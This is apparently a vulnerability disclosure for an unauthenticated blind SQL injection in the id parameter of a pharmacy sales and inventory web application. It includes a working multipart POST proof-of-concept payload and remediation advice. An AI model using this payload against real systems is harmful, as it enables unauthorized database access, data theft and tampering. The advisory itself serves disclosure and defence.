# Vulnerability Summary: SQL Injection in sourcecodedoster Pharmacy Sales and Inventory System ## Vulnerability Overview * **Affected Product**: Pharmacy Sales and Inventory System Project V1.0 * **Vulnerability Type**: SQL Injection * **Vulnerable File**: `/ajax.php?action=save_type` * **Root Cause**: Attackers inject malicious code via the `id` parameter. Due to a lack of input validation, SQL queries are manipulated. * **Exploitation Conditions**: No authentication or authorization is required to exploit this vulnerability. ## Impact Scope * Attackers can gain unauthorized access to the database. * This may lead to sensitive data leakage, data tampering, system takeover, or even service disruption. ## Vulnerability Details and POC **Vulnerable Parameter**: `id` **Vulnerability Type**: Boolean-based blind **Payload Code:** ```text --- Parameter: MULTIPART id ((custom) POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: -----------------3738858121816587200387936454 Content-Disposition: form-data; name="id" (SELECT (CASE WHEN (7479=7479) THEN 1 ELSE (SELECT 5293 UNION SELECT 7746) END)) -----------------3738858121816587200387936454 Content-Disposition: form-data; name="name" 1111 -----------------3738858121816587200387936454--- ``` ## Remediation 1. **Use Prepared Statements and Parameter Binding**: Prepared statements separate SQL code from user input data, preventing SQL injection. 2. **Input Validation and Filtering**: Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize Database User Privileges**: Ensure that the account used to connect to the database has only the minimum necessary privileges, avoiding the use of accounts with elevated privileges (such as root/admin) for daily operations. 4. **Regular Security Audits**: Conduct regular code and system security audits to promptly identify and remediate potential security vulnerabilities.